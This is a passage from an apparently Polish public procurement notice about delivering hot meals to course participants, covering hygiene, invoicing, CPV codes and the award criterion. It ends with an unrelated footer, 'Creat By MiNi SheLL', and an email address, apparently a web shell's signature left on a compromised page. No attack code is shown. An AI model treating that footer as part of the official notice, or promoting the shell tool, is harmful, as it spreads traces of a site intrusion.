20.	Do zadań Wykonawcy należy również obsługa i zapewnienie odbioru odpadów pokonsumpcyjnych (pojemników termoizolacyjnych, sztućców) po posiłku. Zamawiający zastrzega sobie możliwość zmiany ilości dostarczonych posiłków (zmniejszenia) w zależności od faktycznie istniejących potrzeb - poprzez telefoniczną informację najpóźniej do godz. 10:00 w dniu planowanego dnia posiłku. Uczestnicy kwitują odbiór posiłku własnoręcznym podpisem. Rozliczenie nastąpi za rzeczywistą ilość dostarczonych posiłków. Ceny zaoferowane przez wykonawcę nie ulegną zmianie przez okres obowiązywania umowy.  
21.	Posiłek powinien być w formie ciepłego dania obiadowego wraz z napojem. Obiad dla każdego uczestnika ma być podany na ciepło w pojemniku termoizolacyjnym (posiadającym  stosowny atest), z kompletem sztućców i serwetek. Należy zadbać o zróżnicowane menu składające się z posiłków dostarczających podstawowych wartości odżywczych. Wykonawca odpowiada za przygotowanie i transport przedmiotu zamówienia zgodnie z obowiązującymi wymaganiami sanitarnymi dotyczącymi żywności i żywienia zbiorowego, dostarcza posiłki do miejsca spożycia zapewniając utrzymanie właściwej jakości i temperatury. Przygotowanie posiłków odbywać się musi wyłącznie na bazie pełnowartościowych produktów wysokiej jakości oraz produktów posiadających stosowne atesty.
22.	Wykonawcy przysługuje wynagrodzenie za ilość wydanych posiłków, uzależnioną od obecności uczestników na zajęciach.
23.	Wykonawca będzie dostarczał do siedziby PWK OHP fakturę/rachunek za dany miesiąc do 5 każdego następnego miesiąca. 
24.	Zamawiający do SIWZ dołącza umowę powierzania przetwarzania danych osobowych  (osobno na MAU 2 i NP), które wyłoniony wykonawca będzie miał obowiązek podpisać wraz z umową na realizację zamówienia publicznego - załącznik nr 4..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com